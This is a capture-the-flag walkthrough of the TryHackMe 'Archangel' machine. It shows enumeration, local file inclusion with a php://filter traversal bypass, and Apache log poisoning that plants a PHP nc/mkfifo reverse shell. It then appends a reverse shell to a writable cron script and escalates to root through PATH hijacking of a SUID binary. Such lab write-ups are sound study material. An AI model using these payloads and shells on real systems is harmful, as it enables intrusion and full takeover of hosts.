disclaimer

The hosts infiltrated in this article are legally authorized. The tools and methods used in this article are only for learning and communication. Please do not use the tools and penetration ideas used in this article for any illegal purposes. I will not be responsible for any consequences arising from this, nor will I be responsible for any misuse or damage caused Responsible.

discovery service

┌──(root💀kali)-[~/tryhackme/Archangel]
└─# nmap -sV -Pn 10.10.228.134 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-29 05:43 EDT
Nmap scan report for 10.10.228.134
Host is up (0.32s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp openssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp openhttpApache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.39 seconds 

Infiltrate port 80

Blasting catalog

┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.228.134 _|. _ ____ _|_v0.4.2 (_||| _) (/_(_|| (_| ) Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/10.10.228.134/_21-10-29_06-02-36.txt

Error Log: /root/dirsearch/logs/errors-21-10-29_06-02-36.log

Target: http://10.10.228.134/

[06:02:37] Starting: 
[06:03:59] 301 -312B- /flags->http://10.10.228.134/flags/[06:04:06] 301 -313B- /images->http://10.10.228.134/images/[06:04:06] 200 -0B- /images/[06:04:08] 200 - 19KB - /index.html 
[06:04:29] 301 -312B- /pages->http://10.10.228.134/pages/[06:04:30] 200 -0B- /pages/ 
[06:04:44] 403 -277B- /server-status 

/flags redirects to a youtube video, no other information, should be a rabbit hole other folders have no other information

Check the source code of the webpage, find a domain name in Send us a mail, write mafialive.thm into the host file

echo "10.10.228.134 mafialive.thm" >> /etc/hosts

Open mafialive.thm and find flag1

Blow up the directory again

┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://mafialive.thm _|. _ ____ _|_v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/mafialive.thm/_21-11-01_06-52-00.txt

Error Log: /root/dirsearch/logs/errors-21-11-01_06-52-00.log

Target: http://mafialive.thm/

[06:52:01] Starting: 
[06:53:22] 200 - 59B- /index.html 
[06:53:50] 200 - 34B- /robots.txt[06:54:02] 200 -286B- /test.php 

Open test.php, click the webpage buttom, the url displays a string of paths, modifying the path file name can access the content of some files on the server, indicating that there is an LFI vulnerability

We use the php pseudo-protocol to output the source code of the entire webpage, and the payloadr is as follows

/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php 

Print out the source code of test.php and get flag2

Review upload code

<?php
 function containsStr($str, $substr) {return strpos($str, $substr) !== false;}if(isset($_GET["view"])){if(!containsStr($_GET['view'], '../..') && containsStr($_GET['view'], '/var/www/html/development_testing')) {include $_GET['view'];}else{echo 'Sorry, Thats not allowed';}
 ?> 

Only when the two strings of ../.. and /var/www/html/development_testing must be present, the inclusion logic will take effect

We can use // instead of / to bypass the restriction that ../.. cannot appear, and read /etc/passwdpayload as follows

/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/..//..//..//..//etc/passwd 

Get the username after decryption

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
archangel:x:1001:1001:Archangel,,,:/home/archangel:/bin/bash 

It can be seen from the above that there is a user archangel. There is no result after blasting this user's ssh, so I can only think of other methods

After testing here, I got the path of apache's access.log

/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/..//..//..//..//var/log/apache2/access.log 

analyze

There is a file parsing vulnerability in the apache2.4-2.9 version. Combined with LFI, we can write the payload into the log, and then access the log file on the web page, then the rebound shell can be triggered

First, let's look at normal log records like this:

10.13.21.169 - - [02/Nov/2021:14:14:38 +0530] "GET /test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/..//..//..//..//etc/passwd HTTP/1.1" 200 1277 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" 

As can be seen from the above log, apache records the url access path and User-Agent information

Then we can write the php code to User-Agent, taking the above as an example, the effect we expect is this:

10.13.21.169 - - [02/Nov/2021:14:14:38 +0530] "GET /test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/..//..//..//..//etc/passwd HTTP/1.1" 200 1277 "-" "<php phpinfo(); ?>" 

Then access this log in the browser

If the php version information can be displayed on the web page at this time, it means that our php code can be executed normally

attack

Open burpsuite, we write the payload to User-Agent:

GET /test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/..//..//..//..//var/log/apache2/access.log HTTP/1.1
Host: mafialive.thm
User-Agent: "<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.21.169 4444 >/tmp/f') ?>"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1 

open monitor

nc -lnvp 4444

trigger

http://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//..//var/log/apache2/access.log 

Reverse shell received

┌──(root💀kali)-[~/tryhackme/Archangel]
└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.228.134] 54296
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$ ls
index.html
mrrobot.php
robots.txt
test.php
$ cd /home
$ ls
archangel
$ cd archangel
$ ls
myfiles
secret
user.txt 

Get user.txt in the same folder, the secret file has no read permission, there is a password file in the myfiles folder, and the content of the file is the video of Don’t Give Up (AKA: Tease You) in youtube

Elevate rights to archangel

It is passed that linpeas found that there is a scheduled task of archangel, and this file is still writable

www-data@ubuntu:/var/www/html/development_testing$ cat /opt/helloworld.sh
cat /opt/helloworld.sh
#!/bin/bash
echo "hello world" >> /opt/backupfiles/helloworld.txt
www-data@ubuntu:/var/www/html/development_testing$ ls -alh /opt/helloworld.sh
ls -alh /opt/helloworld.sh
-rwxrwxrwx 1 archangel archangel 66 Nov 202020 /opt/helloworld.sh 

Write shell to timed task

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.21.169 4242 >/tmp/f" >> /opt/helloworld.sh 

Reverse shell received

┌──(root💀kali)-[~/tryhackme/Archangel]
└─# nc -lnvp 4242 
listening on [any] 4242 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.228.134] 37592
/bin/sh: 0: can't access tty; job control turned off
$ whoami
archangel
$ id
uid=1001(archangel) gid=1001(archangel) groups=1001(archangel)
$ 

Get the second user.txt in /home/archangel/secret

Escalation of rights

There is a backup file in the same folder with SUID permission. After downloading it to the target machine, use the strings command to analyze it. It is found that there is a shell fragment:

┌──(root💀kali)-[~/tryhackme/Archangel]
└─# strings backup
/lib64/ld-linux-x86-64.so.2
setuid
system
__cxa_finalize
setgid
__libc_start_main
libc.so.6
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u+UH
[]A\A]A^A_
cp /home/user/archangel/myfiles/* /opt/backupfiles 

analyze

We observe the above line of shell code

cp /home/user/archangel/myfiles/* /opt/backupfiles 

The code itself is to copy the content on /home/user/archangel/myfiles/* to /opt/backupfiles through the cp command

We know that the SUID file is a file that ordinary users can run as root. Although the cp in this file is a command issued by the ordinary user group, it is run as root. That is to say, if we can hijack this command and rewrite it content, we can use it to elevate rights.

In linux, all user commands are stored in his $PATH environment variable. When we type commands one by one in the terminal, the linux server will search for the command one by one from the current user's environment variable path. If the binary file of the command exists, execute it; if it does not exist, report command not found.

start escalation

View the current user's environment variable $PATH

echo $PATH
/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin 

Add the home directory /home/archangel to the environment variable $PATH

archangel@ubuntu:~$ export PATH=/home/archangel:$PATH
export PATH=/home/archangel:$PATH
archangel@ubuntu:~$ echo $PATH
echo $PATH
/home/archangel:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin 

Create a cp file under the newly added $PATH path and give it execution permission

archangel@ubuntu:~$ touch cp
touch cp
archangel@ubuntu:~$ chmod +x cp
chmod +x cp 

Add the following code to the newly created cp file

#!/bin/bash
bash -p 

view cp file

archangel@ubuntu:~$ cat cp
cat cp
#!/bin/bash
bash -p 

Everything is ready, execute SUID file backup, and escalate to root

archangel@ubuntu:~/secret$ ./backup
./backup
root@ubuntu:~/secret# id
id
uid=0(root) gid=0(root) groups=0(root),1001(archangel)
root@ubuntu:~/secret# whoami
whoami
root
root@ubuntu:~/secret# cat /root/root.txt
cat /root/root.txt 

Summarize

Wonderful target machine, learned a lot of new knowledge. There are generally two postures for LFI to hold the shell:

1.LFI+ upload file getshell 2. LFI+ file parsing vulnerability getshell This article uses the second method. Regarding the first method, I am in this drone there is a record

In terms of privilege escalation, the method of modifying the environment variable $PATH is used. This method of privilege escalation needs to be combined with SUID. This article modifies the cp command, but other commands may also be modified. Such as mv,tar, etc., this depends on the specific situation of the target machine.